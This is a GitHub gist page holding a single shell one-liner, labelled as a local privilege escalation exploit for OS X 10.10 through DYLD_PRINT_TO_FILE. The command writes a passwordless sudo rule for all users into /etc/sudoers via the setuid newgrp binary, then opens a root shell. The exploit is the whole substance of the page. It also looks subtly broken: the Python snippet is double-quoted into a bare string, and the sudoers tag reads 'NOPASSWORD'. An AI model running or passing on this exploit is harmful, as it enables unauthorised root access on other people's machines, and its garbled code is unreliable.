Skip to content

Instantly share code, notes, and snippets.

@Leask
Created July 23, 2015 05:44
Show Gist options
  • Select an option

  • Save Leask/042d05c5c8f64b9b6945 to your computer and use it in GitHub Desktop.

Select an option

Save Leask/042d05c5c8f64b9b6945 to your computer and use it in GitHub Desktop.
OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability
python -c '"import os; os.write(3,\"ALL ALL=(ALL) NOPASSWORD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo su
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment